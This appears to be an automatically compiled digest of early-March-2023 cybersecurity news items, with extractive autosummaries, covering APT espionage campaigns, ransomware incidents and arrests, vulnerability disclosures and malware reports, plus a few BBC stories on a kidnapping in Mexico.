                High-profile government entities in Southeast Asia are the target of a cyber espionage campaign undertaken by a Chinese threat actor known as Sharp Panda since late last year. The intrusions are characterized by the use of a new version of the Soul modular framework, marking a departure from the group’s attack chains observed in 2021. Israeli cybersecurity company Check Point said the "

                Autosummary: It further noted that the campaign is likely "staged by advanced Chinese-backed threat actors, whose other tools, capabilities and position within the broader network of espionage activities are yet to be explored." "


                China-linked APT Sharp Panda targets government entities in Southeast Asia

                government
                2023-03-08 https://securityaffairs.com/143187/apt/sharp-panda-targets-southeast-asia.html

                China-linked APT group Sharp Panda targets high-profile government entities in Southeast Asia with the Soul modular framework. In late 2022, CheckPoint researchers observed a campaign attributed to the China-linked APT group Sharp Panda targeting a high-profile government entity in Southeast Asia. The state-sponsored hackers used a new version of the SoulSearcher loader, which eventually loads a new […]

                The post China-linked APT Sharp Panda targets government entities in Southeast Asia appeared first on Security Affairs.

                "

                Autosummary: "


                VMware NSX Manager bugs actively exploited in the wild since December

                exploits
                2023-03-08 https://securityaffairs.com/143172/hacking/vmware-nsx-manager-bugs-attacks.html

                Security researchers warn of hacking attempts in the wild exploiting critical vulnerabilities in VMware NSX Manager. Cyber security firm Wallarm is warning of ongoing attacks exploiting the critical flaws, tracked as CVE-2021-39144 (CVSS score of 9.8) and CVE-2022-31678 (CVSS score of 9.1), in VMware NSX Manager. VMware NSX is a network virtualization solution that is […]

                The post VMware NSX Manager bugs actively exploited in the wild since December appeared first on Security Affairs.

                "

                Autosummary: "


                Pen Testers using Vulnerability Scanners – Closing the Gap

                exploits
                2023-03-08 https://www.bleepingcomputer.com/news/security/pen-testers-using-vulnerability-scanners-closing-the-gap/
                Both penetration testing and vulnerability scanning are essential to upholding and maintaining a strong security posture. Here are the benefits of combining both to maximize coverage and your web application security. [...] "

                Autosummary: A direct comparison of pen testing with automated scanning tools only concerns dynamic application security testing tools, or DAST, since static security testing tools require source code access, which is typically unavailable to penetration testers. Since traditional penetration testing can be time-consuming and allows glaring security vulnerabilities to remain exposed for long periods of time, thanks to strictly point-in-time results, businesses need to rely on PTaaS for real-time insight into security vulnerabilities. "


                CISA adds three new bugs to Known Exploited Vulnerabilities Catalog

                exploits
                2023-03-08 https://securityaffairs.com/143204/security/cisa-known-exploited-vulnerabilities-catalog-2.html

                US CISA added actively exploited flaws in Teclib GLPI, Apache Spark, and Zoho ManageEngine ADSelfService Plus to its Known Exploited Vulnerabilities Catalog. US CISA added the following actively exploited flaws to its Known Exploited Vulnerabilities Catalog: The CVE-2022-35914 flaw is a PHP code injection vulnerability that resides in the /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module for GLPI […]

                The post CISA adds three new bugs to Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.

                "

                Autosummary: "


                Fortinet warns of new critical unauthenticated RCE vulnerability

                exploits
                2023-03-08 https://www.bleepingcomputer.com/news/security/fortinet-warns-of-new-critical-unauthenticated-rce-vulnerability/
                Fortinet has disclosed a "Critical" vulnerability impacting FortiOS and FortiProxy, which allows an unauthenticated attacker to execute arbitrary code or perform denial of service (DoS) on the GUI of vulnerable devices using specially crafted requests. [...] "

                Autosummary: "


                Veeam fixes bug that lets hackers breach backup infrastructure

                exploits
                2023-03-08 https://www.bleepingcomputer.com/news/security/veeam-fixes-bug-that-lets-hackers-breach-backup-infrastructure/
                Veeam urged customers to patch a high-severity Backup Service security vulnerability impacting its Backup & Replication software. [...] "

                Autosummary: "


                Ransomware gang posts video of data stolen from Minneapolis schools

                exploits
                2023-03-08 https://www.bleepingcomputer.com/news/security/ransomware-gang-posts-video-of-data-stolen-from-minneapolis-schools/
                The Medusa ransomware gang is demanding a $1,000,000 ransom from the Minneapolis Public Schools (MPS) district to delete data allegedly stolen in a ransomware attack. [...] "

                Autosummary: MPS not paying The Minneapolis Public School published an announcement on March 1, 2023, disclosing its suffering from an "encryption event" that caused system outages since February 21, 2023. "


                Two survivors of Mexico kidnapping recovering in US hospitals

                latam
                2023-03-08 https://www.bbc.co.uk/news/world-us-canada-64882744?at_medium=RSS&at_campaign=KARANGA
                One of them has gunshot wounds and two of their friends were killed by gangs at a Mexico border town. "

                Autosummary: "


                A single mistake could explain the Mexico kidnappings

                latam
                2023-03-08 https://www.bbc.co.uk/news/world-latin-america-64825204?at_medium=RSS&at_campaign=KARANGA
                A theory that the kidnapping of four Americans was a case of mistaken identity is strengthening. "

                Autosummary: "


                FBI investigates data breach impacting U.S. House members and staff

                financial
                2023-03-08 https://www.bleepingcomputer.com/news/security/fbi-investigates-data-breach-impacting-us-house-members-and-staff/
                The FBI is investigating a data breach affecting U.S. House of Representatives members and staff after their account and personal information was stolen from DC Health Link’s servers. [...] "

                Autosummary: Subscriber ID,Member ID,Policy ID,Status,First Name,Last Name,SSN,DOB,Gender,Relationship,Benefit Type,Plan Name,HIOS ID,Plan Metal Level,Carrier Name,Premium Amount,Premium Total,Policy APTC,Policy Employer Contribution,Coverage Start,Coverage End,Employer Name,Employer DBA,Employer FEIN,Employer HBX ID,Home Address,Mailing Address,Work Email,Home Email,Phone Number,Broker,Race,Ethnicity,Citizen Status,Plan Year Start,Plan Year End,Plan Year Status "


                Ransomware review: March 2023

                exploits
                2023-03-08 https://www.malwarebytes.com/blog/threat-intelligence/2023/03/ransomware-review-march-2023

                Categories: Ransomware

                Categories: Threat Intelligence

                February 2023 saw a record number of victims for LockBit, a record high ransom demand, and a devastating assault on the City of Oakland.


                The post Ransomware review: March 2023 appeared first on Malwarebytes Labs.

                "

                Autosummary: [Figures: Known ransomware attacks by gang, by country, and by industry sector, February 2023] Companies attacked along LockBit’s warpath last month include financial software firm ION Group and Pierce Transit, a public transit operator in Washington state. The report states: The authoring agencies assess that an unspecified amount of revenue from these cryptocurrency operations supports DPRK national-level priorities and objectives, including cyber operations targeting the United States and South Korea governments—specific targets include Department of Defense Information Networks and Defense Industrial Base member networks. In the last few years, two new ransomware strains from DPRK have surfaced: Maui and H0lyGh0st. [Figure: The V is Vendetta leak site] DPRK’s ransomware antics: In early February, CISA released an alert highlighting the continuous state-sponsored ransomware activities by the Democratic People’s Republic of Korea (DPRK) against organizations in the US healthcare sector and other vital infrastructure sectors. The apparently Russian-based group tallied just two victims on its leak site in February, but—true to their modus operandi—both of them were educational institutions: Guildford County School, a specialist music academy in London, and Mount Saint Mary College, a liberal arts college in New York. "


                Veeam warns to install patches to fix a bug in its Backup & Replication product

                exploits
                2023-03-08 https://securityaffairs.com/143218/security/veeam-backup-replication-bug.html

                Veeam addressed a high-severity vulnerability in the Backup Service that impacts Backup & Replication software. Veeam addressed a high-severity vulnerability in the Backup Service, tracked as CVE-2023-27532 (CVSS v3 score: 7.5), that impacts all versions of its Backup & Replication software. “Vulnerability CVE-2023-27532 in Veeam Backup & Replication component allows to obtain encrypted credentials stored in the […]

                The post Veeam warns to install patches to fix a bug in its Backup & Replication product appeared first on Security Affairs.

                "

                Autosummary: "


                Palo Alto Networks enhances cybersecurity capabilities with AI-powered ITDR module

                ciber
                2023-03-07 https://www.helpnetsecurity.com/2023/03/07/palo-alto-networks-cortex-xsiam/

                Palo Alto Networks released a new Identity Threat Detection and Response (ITDR) module for Cortex XSIAM, enabling customers to ingest user identity and behavior data and deploy AI technology to detect identity-driven attacks within seconds. The module further strengthens XSIAM’s ability to consolidate multiple security operations capabilities into a unified, AI-driven security operations center (SOC) platform. Identity-driven attacks, which target user credentials to access confidential data and systems, are one of the most common methods cyber … More

                The post Palo Alto Networks enhances cybersecurity capabilities with AI-powered ITDR module appeared first on Help Net Security.

                "

                Autosummary: Cortex XSIAM already natively integrates security information and event management (SIEM), endpoint detection and response (EDR), network detection and response (NDR), security, orchestration and response (SOAR), Threat Intelligence Management (TIM) and Attack Surface management (ASM) capabilities, replacing the need for multiple point solutions. "


                Preventing corporate data breaches starts with remembering that leaks have real victims

                financial
                2023-03-07 https://www.helpnetsecurity.com/2023/03/07/preventing-corporate-data-breaches/

                When it comes to data breaches, organizations are generally informed about the risks and procedures for mitigating them. They can (typically) respond with minimal collateral damage. But the impact a data breach can have on individuals can be devastating; getting back to something that vaguely resembles normality is very challenging. In my work helping these people, I’ve been asked multiple times whether it would help to get a new phone number or even move to … More

                The post Preventing corporate data breaches starts with remembering that leaks have real victims appeared first on Help Net Security.

                "

                Autosummary: Thankfully, in many countries, volunteers such as those involved with KyberVPK in Finland have rolled up their sleeves and formed “volunteer cyber fire brigades” to help organizations such as hospitals and schools with cyber-related issues in case of attack. For individuals, there is often a general lack of security awareness and understanding of things like multifactor authentication, security products, and what a big leak can mean for them at a personal level. "


                Vulnerability in DJI drones may reveal pilot’s location

                exploits
                2023-03-07 https://www.helpnetsecurity.com/2023/03/07/vulnerability-dji-drones-reveal-pilot-location/

                Serious security vulnerabilities have been identified in multiple DJI drones. These weaknesses had the potential to allow users to modify crucial drone identification details such as its serial number and even bypass security mechanisms that enable authorities to track both the drone and its pilot. In special attack scenarios, the drones could even be brought down remotely in flight. Photo by: RUB, Marquard The team headed by Nico Schiller of the Horst Görtz Institute for … More

                The post Vulnerability in DJI drones may reveal pilot’s location appeared first on Help Net Security.

                "

                Autosummary: Photo by: RUB, Marquard The team headed by Nico Schiller of the Horst Görtz Institute for IT Security at Ruhr University Bochum, Germany, and Professor Thorsten Holz, from the CISPA Helmholtz Center for Information Security, have presented their findings at the Network and Distributed System Security Symposium. DJI drones put to the test The team tested three DJI drones of different categories: the small DJI Mini 2, the medium-sized Air 2, and the large Mavic 2. "


                LastPass Hack: Engineer"s Failure to Update Plex Software Led to Massive Data Breach

                financial
                2023-03-07 https://thehackernews.com/2023/03/lastpass-hack-engineers-failure-to.html
                The massive breach at LastPass was the result of one of its engineers failing to update Plex on their home computer, in what’s a sobering reminder of the dangers of failing to keep software up-to-date. The embattled password management service last week revealed how unidentified actors leveraged information stolen from an earlier incident that took place prior to August 12, 2022, along with "

                Autosummary: "


                Transparent Tribe Hackers Distribute CapraRAT via Trojanized Messaging Apps

                exploits
                2023-03-07 https://thehackernews.com/2023/03/transparent-tribe-hackers-distribute.html
                A suspected Pakistan-aligned advanced persistent threat (APT) group known as Transparent Tribe has been linked to an ongoing cyber espionage campaign targeting Indian and Pakistani Android users with a backdoor called CapraRAT. "Transparent Tribe distributed the Android CapraRAT backdoor via trojanized secure messaging and calling apps branded as MeetsApp and MeetUp," ESET said in a report "

                Autosummary: "


                Love scam or espionage? Transparent Tribe lures Indian and Pakistani officials

                financial
                2023-03-07 https://www.welivesecurity.com/2023/03/07/love-scam-espionage-transparent-tribe-lures-indian-pakistani-officials/

                ESET researchers analyze a cyberespionage campaign that distributes CapraRAT backdoors through trojanized and supposedly secure Android messaging apps – but also exfiltrates sensitive information

                The post Love scam or espionage? Transparent Tribe lures Indian and Pakistani officials appeared first on WeLiveSecurity

                "

                Autosummary: Based on these commands, CapraRAT is capable of exfiltrating: call logs, the contacts list, SMS messages, recorded phone calls, recorded surrounding audio, CapraRAT-taken screenshots, CapraRAT-taken photos, a list of files on the device, any particular file from the device, device location, a list of running apps, and text of all notifications from other apps. It can also receive commands to download a file, launch any installed app, kill any running app, make a call, send SMS messages, intercept received SMS messages, and download an update and request the victim to install it. Once this account is created, the app requests further permissions that allow the backdoor’s full functionality to work, such as accessing contacts, call logs, SMS messages, external storage, and recording audio. This information allowed us to geolocate over 150 victims in India, Pakistan, Russia, Oman, and Egypt, as seen in Figure 4. Technical analysis – Initial access: As described above, the malicious MeetUp app has been available at meetup-chat[.]com, and we believe with high confidence that the malicious MeetsApp was available at meetsapp[.]org. "


                Expert released PoC exploit code for critical Microsoft Word RCE flaw

                exploits
                2023-03-07 https://securityaffairs.com/143139/hacking/microsoft-word-cve-2023-21716-poc.html

                Security researcher released a proof-of-concept exploit code for a critical flaw, tracked as CVE-2023-21716, in Microsoft Word. Security researcher Joshua Drake released a proof-of-concept for a critical vulnerability, tracked as CVE-2023-21716 (CVSS score 9.8 out of 10), in Microsoft Word. The vulnerability can be exploited by a remote attacker to execute arbitrary code on a […]

                The post Expert released PoC exploit code for critical Microsoft Word RCE flaw appeared first on Security Affairs.

                "

                Autosummary: Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Microsoft Word) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "


                Two Americans kidnapped in Mexico are dead - governor

                latam
                2023-03-07 https://www.bbc.co.uk/news/world-latin-america-64878721?at_medium=RSS&at_campaign=KARANGA
                Their fate is confirmed by a Mexican state governor, who says two other Americans are alive.



                Hospital Clínic de Barcelona severely impacted by ransomware attack

                exploits ransomware
                2023-03-07 https://www.bleepingcomputer.com/news/security/hospital-cl-nic-de-barcelona-severely-impacted-by-ransomware-attack/
                The Hospital Clínic de Barcelona suffered a ransomware attack on Sunday morning, severely disrupting its healthcare services after the institution's virtual machines were targeted by the attacks. [...]

                Autosummary: Radiology, endoscopic tests, radiological scans, dialysis, and outpatient pharmacy services will continue operating normally.


                Acer discloses a new data breach, 160 GB of sensitive data available for sale

                financial
                2023-03-07 https://securityaffairs.com/143150/data-breach/acer-data-breach-160-gb.html

                Taiwanese multinational hardware and electronics corporation Acer discloses a data breach after a threat actor claimed the hack of the company. Recently a threat actor announced the availability for sale of 160 GB of data allegedly stolen from the Taiwanese multinational hardware and electronics corporation Acer. The threat actor announced the hack on a popular cybercrime forum, he claims […]

                The post Acer discloses a new data breach, 160 GB of sensitive data available for sale appeared first on Security Affairs.

                "

                Autosummary: "


                Emotet malware attacks return after three-month break

                exploits
                2023-03-07 https://www.bleepingcomputer.com/news/security/emotet-malware-attacks-return-after-three-month-break/
                The Emotet malware operation is again spamming malicious emails as of Tuesday morning after a three-month break, rebuilding its network and infecting devices worldwide. [...]

                Autosummary: [Figure: Swollen Emotet DLL to evade detection (Source: BleepingComputer)] Once running, the malware will run in the background, awaiting commands, which will likely install further payloads on the device. The payloads allow other threat actors to remotely access the device, which is then used to spread further in the compromised network. [Figure: Macros disabled by default in Microsoft Office (Source: BleepingComputer)] ANALYGENCE senior vulnerability analyst Will Dormann told BleepingComputer that this change also affects attachments saved from emails.


                DoppelPaymer ransomware group disrupted by FBI and European police agencies

                exploits ransomware
                2023-03-07 https://www.malwarebytes.com/blog/news/2023/03/doppelpaymer-ransomware-group-disrupted-by-fbi-and-european-police-agencies

                Categories: News, Ransomware

                Tags: Europol, FBI, police, arrests, DoppelPaymer, Emotet, Dridex

                In cooperation with the FBI, European police agencies have made arrests that disrupt the DoppelPaymer ransomware operation


                The post DoppelPaymer ransomware group disrupted by FBI and European police agencies appeared first on Malwarebytes Labs.

                "

                Autosummary: Other victims attacked by DoppelPaymer in the past include Compal, PEMEX (Petróleos Mexicanos), the City of Torrance in California, Newcastle University, Hall County in Georgia, Banijay Group SAS, and Bretagne Télécom. On 28 February 2023, the German Regional Police and the Ukrainian National Police, with support from Europol, the Dutch Police, and the United States Federal Bureau of Investigation (FBI), apprehended two suspects and seized equipment to determine the suspects' exact role in the structure of the ransomware group.


                Play ransomware gang leaks City of Oakland data

                exploits government ransomware
                2023-03-07 https://www.malwarebytes.com/blog/news/2023/03/play-ransomware-gang-leaks-city-of-oakland-data-

                Categories: News, Ransomware

                Tags: Play ransomware, ransomware, City of Oakland, Oakland California

                After claiming responsibility for attacking the City of Oakland, California, the Play ransomware gang has begun leaking the data it stole.


                The post Play ransomware gang leaks City of Oakland data appeared first on Malwarebytes Labs.

                "

                Autosummary: [Figure: Play ransomware gang's leak page for the City of Oakland, California] Following the release of the data, the City of Oakland said in an updated statement: "While the investigation into the scope of the incident impacting the City of Oakland remains ongoing, we recently became aware that an unauthorized third party has acquired certain files from our network and intends to release the information publicly."


                Warning issued over Royal ransomware

                exploits ransomware
                2023-03-07 https://www.malwarebytes.com/blog/news/2023/03/warning-issued-over-royal-ransomware

                Categories: News, Ransomware

                Tags: CISA, Royal, ransomware, phishing, RDP, public facing applications

                In a Cybersecurity Advisory, CISA and the FBI have shared information about Royal ransomware, which despite being rather new has made a real name for itself.


                The post Warning issued over Royal ransomware appeared first on Malwarebytes Labs.

                "

                Autosummary: Other methods that are used to gain initial access to victim networks are: phishing, using emails containing malicious PDF documents, and malvertising; Remote Desktop Protocol (RDP), using compromised or brute-forced login credentials; and exploiting public-facing applications.


                SYS01 stealer targets critical government infrastructure

                government
                2023-03-07 https://securityaffairs.com/143162/cyber-crime/sys01-stealer-targets-critical-infrastructure.html

                Researchers discovered a new info stealer dubbed SYS01 stealer targeting critical government infrastructure and manufacturing firms. Cybersecurity researchers from Morphisec discovered a new, advanced information stealer, dubbed SYS01 stealer, that since November 2022 was employed in attacks aimed at critical government infrastructure employees, manufacturing companies, and other sectors. The experts found similarities between the SYS01 stealer and another […]

                The post SYS01 stealer targets critical government infrastructure appeared first on Security Affairs.

                "

                Autosummary: The malware also steals information from the victim's personal Facebook account, including name, email address, date of birth, and user ID, along with other data such as 2FA codes, user agents, IP address, and geolocation. The malware is also able to upload files from the infected system to the C2 server and execute commands sent by the C&C.


                Mexico kidnapping: Why a million Americans a year risk Mexico medical tourism

                latam
                2023-03-07 https://www.bbc.co.uk/news/world-us-canada-64832308?at_medium=RSS&at_campaign=KARANGA
                Some take precautions to avoid being targeted by criminals, like changing their car's licence plate.



                The moment four Americans were kidnapped in Mexico

                latam
                2023-03-07 https://www.bbc.co.uk/news/world-us-canada-64881997?at_medium=RSS&at_campaign=KARANGA
                Two of the victims were killed, and two are alive and in a safe location, authorities in Mexico said.



                New malware variant has “radio silence” mode to evade detection

                exploits
                2023-03-07 https://www.bleepingcomputer.com/news/security/new-malware-variant-has-radio-silence-mode-to-evade-detection/
                The Sharp Panda cyber-espionage hacking group was observed targeting high-profile government entities in Vietnam, Thailand, and Indonesia, using a new version of the "Soul" malware framework. [...]

                Autosummary: [Figure: Commands supported by Soul (Check Point)] Check Point did not sample additional modules that might perform more specialized functions such as file actions, data exfiltration, keylogging, screenshot capturing, etc.


                6 cybersecurity and privacy Firefox add-ons you need to know about

                ciber
                2023-03-06 https://www.helpnetsecurity.com/2023/03/06/cybersecurity-privacy-firefox-add-ons/

                In today’s digital age, cybersecurity and privacy have become major concerns for internet users. With the increase in cyber attacks and data breaches, it is vital to protect your online privacy and security. One way to do this is by using add-ons for your web browser that can help enhance your security and privacy. Firefox is one of the most popular web browsers, and it offers a variety of add-ons that can help you stay … More

                The post 6 cybersecurity and privacy Firefox add-ons you need to know about appeared first on Help Net Security.

                "

                Autosummary: Temporary Containers: with Temporary Containers, you can open disposable containers that isolate attached data and are deleted after usage. They can be opened fully automatically, based on the navigation target, for certain websites, with configured mouse clicks on links, or just by using the toolbar icon.


                XIoT risk and the vulnerability landscape

                exploits industry
                2023-03-06 https://www.helpnetsecurity.com/2023/03/06/xiot-risk-video/

                Recently, Claroty released its State of XIoT Security Report, which shares analyses of publicly disclosed vulnerabilities affecting operational technology (OT), internet of things (IoT) devices, and most recently, the internet of medical things (IoMT). In this Help Net Security video, Nadav Erez, VP of Data at Claroty, discusses these findings and the critical need to understand the XIoT risk and vulnerability landscape. Some of the dominant trends include: 73% of vulnerabilities uncovered are critical or … More

                The post XIoT risk and the vulnerability landscape appeared first on Help Net Security.

                "

                Autosummary: "


                Popular fintech apps expose valuable, exploitable secrets

                exploits
                2023-03-06 https://www.helpnetsecurity.com/2023/03/06/financial-services-apps-vulnerabilities/

                92% of the most popular banking and financial services apps contain easy-to-extract secrets and vulnerabilities that can let attackers steal consumer data and finances, according to Approov. The Approov Mobile Threat Lab downloaded, decoded and scanned the top 200 financial services apps in the U.S., U.K., France and Germany from the Google Play Store, investigating a total of 650 unique apps. 92% of the apps leaked valuable, exploitable secrets and 23% of the apps leaked … More

                The post Popular fintech apps expose valuable, exploitable secrets appeared first on Help Net Security.

                "

                Autosummary: "


                PoC exploit for recently patched Microsoft Word RCE is public (CVE-2023-21716)

                exploits
                2023-03-06 https://www.helpnetsecurity.com/2023/03/06/cve-2023-21716-poc/

                A PoC exploit for CVE-2023-21716, a critical RCE vulnerability in Microsoft Word that can be exploited when the user previews a specially crafted RTF document, is now publicly available. Patches for the flaw – which affects a wide variety of MS Office and SharePoint versions, Microsoft 365 Apps for Enterprise and other products – were released by Microsoft last month. CVE-2023-21716 and the PoC exploit: CVE-2023-21716 was discovered and privately disclosed by security researcher … More

                The post PoC exploit for recently patched Microsoft Word RCE is public (CVE-2023-21716) appeared first on Help Net Security.

                "

                Autosummary: "


                Hatch Bank data breach caused by the exploitation of the GoAnywhere MFT zero-day

                financial exploits
                2023-03-06 https://securityaffairs.com/143085/data-breach/hatch-bank-goanywhere-mft-bug.html

                Fintech platform Hatch Bank disclosed a data breach after hackers exploited a recently discovered zero-day in the Fortra GoAnywhere MFT secure file-sharing platform. Hatch Bank is a fintech firm that provides services to other fintech companies. The company disclosed a data breach and revealed that the attackers had exploited a recently discovered zero-day vulnerability in the company’s […]

                The post Hatch Bank data breach caused by the exploitation of the GoAnywhere MFT zero-day appeared first on Security Affairs.

                "

                Autosummary: Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Hatch Bank) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "


                Threat landscape for industrial automation systems. Statistics for H2 2022

                industry
                2023-03-06 https://ics-cert.kaspersky.com/publications/threat-landscape-for-industrial-automation-systems-statistics-for-h2-2022/
                The statistical data presented in the report was received from ICS computers protected by Kaspersky products that Kaspersky ICS CERT categorizes as part of the industrial infrastructure at organizations.

                Autosummary: 2022 in numbers

                Parameter                                                  | H1 2022 | H2 2022 | 2022
                Percentage of attacked ICS computers globally              | 31.8%   | 34.3%   | 40.6%
                Main threat sources:
                  Internet                                                 | 16.5%   | 19.9%   | 24.0%
                  Email clients                                            | 7.0%    | 6.4%    | 7.9%
                  Removable devices                                        | 3.5%    | 3.8%    | 5.2%
                  Network folders                                          | 0.6%    | 0.6%    | 0.8%
                Percentage of ICS computers on which malicious objects from different categories were blocked:
                  Malicious scripts and phishing pages (JS and HTML)       | 12.9%   | 13.5%   | 17.3%
                  Denylisted internet resources                            | 9.5%    | 10.1%   | 13.2%
                  Spy Trojans, backdoors and keyloggers                    | 8.6%    | 7.1%    | 9.2%
                  Malicious documents (MSOffice+PDF)                       | 5.5%    | 4.5%    | 6.2%
                  Worms                                                    | 2.8%    | 2.5%    | 3.5%
                  Viruses                                                  | 2.4%    | 2.4%    | 3.2%
                  Miners – executable files for Windows                    | 2.3%    | 1.5%    | 2.7%
                  Web miners running in browsers                           | 1.8%    | 1.8%    | 2.5%
                  Malware for AutoCAD                                      | 0.6%    | 0.6%    | 0.8%
                  Ransomware                                               | 0.6%    | 0.4%    | 0.7%

                Russia, H2 2022: In H2 2022, the most significant change among all countries in the percentage of ICS computers on which malicious objects were blocked was observed in Russia, where that percentage increased by 9 p.p.

                In H2 2022, the percentage of ICS computers on which malicious scripts and phishing pages were blocked increased: in Belarus, by 10.3 p.p., yielding 17.8% in H2 2022; in Kyrgyzstan, by 16.4 p.p., yielding 26.4% in H2 2022; in Uzbekistan, by 7.8 p.p., yielding 15.6% in H2 2022; in Kazakhstan, by 6.1 p.p., yielding 14.1% in H2 2022.

                [Chart: Percentage of ICS computers on which malicious objects were blocked, January – December 2022]

                In different regions of the world, the percentage of ICS computers on which malicious activity was prevented ranged from 40.1% in Africa and Central Asia, which led the ranking, to 14.2% and 14.3%, respectively, in Western and Northern Europe, which were the most secure regions.

                [Chart: 15 countries and territories with the highest percentage of ICS computers on which malware was blocked when removable devices were connected, H2 2022]

                Email clients: Southern Europe, which, in H1 2022, topped the ranking of regions based on the percentage of ICS computers on which malicious email attachments and phishing links were blocked, remained at the top of the ranking in H2.

                [Charts: Percentage of ICS computers on which malicious objects from different sources were blocked, Q1 – Q4 2022; Percentage of ICS computers on which malicious objects from email were blocked, January – December 2022]

                There was also a noticeable increase in Q2 2022 in the percentage of ICS computers on which threats were blocked in network folders.

                This group includes Windows computers that perform one or several of the following functions: supervisory control and data acquisition (SCADA) servers; data storage servers (Historian); data gateways (OPC); stationary workstations of engineers and operators; mobile workstations of engineers and operators; human machine interface (HMI); computers used for industrial network administration; computers used to develop software for industrial automation.

                [Chart: Percentage of ICS computers on which malicious objects were blocked, January – December of 2021 and 2022]

                The increase in the percentage of ICS computers in Russia on which malicious objects were blocked in H2 2022 was due to a sharp increase of 11.1 p.p. in the percentage of ICS computers on which malicious scripts and phishing pages were blocked.

                [Chart: Percentage of ICS computers on which denylisted internet resources, as well as malicious scripts and phishing pages were blocked, January – December 2022]

                The sudden surge in the percentage of ICS computers on which malicious scripts and phishing pages were blocked in August and September 2022, as well as the high figures in the following months, were due to mass infections of websites (including those of industrial organizations) that use the Bitrix CMS.

                [Chart: Percentage of ICS computers on which malicious objects from different sources were blocked]

                In H2 2022 in Russia, most industries saw an increase (in some cases, quite significant) in the percentage of ICS computers on which malicious objects were blocked – both as a consequence of mass distribution of malicious scripts and due to a relatively small increase in the percentage of ICS computers in Russia on which spyware was blocked.


                DrayTek VPN routers hacked with new malware to steal data, evade detection

                exploits
                2023-03-06 https://www.bleepingcomputer.com/news/security/draytek-vpn-routers-hacked-with-new-malware-to-steal-data-evade-detection/
                An ongoing hacking campaign called "Hiatus" targets DrayTek Vigor router models 2960 and 3900 to steal data from victims and build a covert proxy network. [...]

                Autosummary: Black Lotus Labs' reverse-engineering analysis revealed the following malware features:
                config – load new configuration from the C2
                shell – spawn a remote shell on the infected device
                file – read, delete, or exfiltrate files to the C2
                executor – fetch and execute a file from the C2
                script – execute a script from the C2
                tcp_forward – transmit any TCP data sent to the host's listening port to a forwarding location
                socks5 – set up a SOCKS v5 proxy on the breached router
                quit – stop the malware execution
                The purpose of the SOCKS proxy is to forward data from other infected machines through the breached router, obfuscating network traffic and mimicking legitimate behavior.


                Core DoppelPaymer ransomware gang members targeted in Europol operation

                exploits ransomware
                2023-03-06 https://www.bleepingcomputer.com/news/security/core-doppelpaymer-ransomware-gang-members-targeted-in-europol-operation/
                Europol has announced that law enforcement in Germany and Ukraine targeted two individuals believed to be core members of the DoppelPaymer ransomware group. [...]

                Autosummary: [Figure: DoppelPaymer attack rate drops (source: ID-Ransomware)] Among DoppelPaymer's high-profile victims are Kia Motors America, the Delaware County in Pennsylvania (paid a $500,000 ransom), laptop maker Compal, the Newcastle University (files leaked), electronics giant Foxconn, and the Dutch Research Council (NWO).


                Law enforcement teams score major win against DoppelPaymer ransomware gang

                exploits ransomware
                2023-03-06 https://www.helpnetsecurity.com/2023/03/06/law-enforcement-doppelpaymer-ransomware-gang/

                In a joint effort, the German Regional Police, Ukrainian National Police, Europol, Dutch Police, and FBI joined forces on February 28, 2023, to take down the masterminds behind a notorious criminal organization responsible for unleashing devastating cyberattacks using the DoppelPaymer ransomware. This ransomware appeared in 2019, when cybercriminals started using it to launch attacks against organizations, critical infrastructure, and industries. Based on the BitPaymer ransomware and part of the Dridex malware family, DoppelPaymer used a … More

                The post Law enforcement teams score major win against DoppelPaymer ransomware gang appeared first on Help Net Security.

                "

                Autosummary: In a joint effort, the German Regional Police, Ukrainian National Police, Europol, Dutch Police, and FBI joined forces on February 28, 2023, to take down the masterminds behind a notorious criminal organization responsible for unleashing devastating cyberattacks using the DoppelPaymer ransomware. "


                New HiatusRAT Malware Targets Business-Grade Routers to Covertly Spy on Victims

                exploits
                2023-03-06 https://thehackernews.com/2023/03/new-hiatusrat-malware-targets-business.html
                A never-before-seen complex malware is targeting business-grade routers to covertly spy on victims in Latin America, Europe, and North America at least since July 2022. The elusive campaign, dubbed Hiatus by Lumen Black Lotus Labs, has been found to deploy two malicious binaries, a remote access trojan dubbed HiatusRAT and a variant of tcpdump that makes it possible to capture packets on



                Core Members of DoppelPaymer Ransomware Gang Targeted in Germany and Ukraine

                exploits ransomware
                2023-03-06 https://thehackernews.com/2023/03/core-members-of-doppelpaymer-ransomware.html
                Law enforcement authorities from Germany and Ukraine have targeted suspected core members of a cybercrime group that has been behind large-scale attacks using DoppelPaymer ransomware. The operation, which took place on February 28, 2023, was carried out with support from the Dutch National Police (Politie) and the U.S. Federal Bureau of Investigation (FBI), according to Europol. This encompassed



                US government orders States to conduct cyber security audits of public water systems

                government
                2023-03-06 https://securityaffairs.com/143065/security/public-water-systems-cybersecurity.html

                The US government urges cyber security audits of public water systems, highlighting the importance of securing US critical infrastructure. The Biden administration announced on Friday that it will make it mandatory for states to conduct cyber security audits of public water systems. Water systems are critical infrastructure that is increasingly exposed to the risk […]

                The post US government orders States to conduct cyber security audits of public water systems appeared first on Security Affairs.

                "

                Autosummary: “Cyberattacks against critical infrastructure facilities, including drinking water systems, are increasing, and public water systems are vulnerable,” said EPA Assistant Administrator Radhika Fox, as reported by the Associated Press.


                Four Americans kidnapped from minivan in Mexico, FBI says

                latam
                2023-03-06 https://www.bbc.co.uk/news/world-us-canada-64842273?at_medium=RSS&at_campaign=KARANGA
                Unidentified gunmen fired at the four Americans and took them away in a vehicle, the FBI said.



                Sandbox blockchain game breached to send emails linking to malware

                exploits
                2023-03-06 https://www.bleepingcomputer.com/news/security/sandbox-blockchain-game-breached-to-send-emails-linking-to-malware/
                The Sandbox blockchain game is warning its community that a security incident caused some users to receive fraudulent emails impersonating the game, trying to infect them with malware. [...]

                Autosummary: The Sandbox is a blockchain-based open-world multiplayer game with over 350,000 active monthly users, offering them ways to build, own, and monetize interactive content like virtual worlds, items, and experiences.


                European police dismantled the DoppelPaymer ransomware gang

                exploits ransomware
                2023-03-06 https://securityaffairs.com/143110/cyber-crime/europol-doppelpaymer-ransomware-gang.html

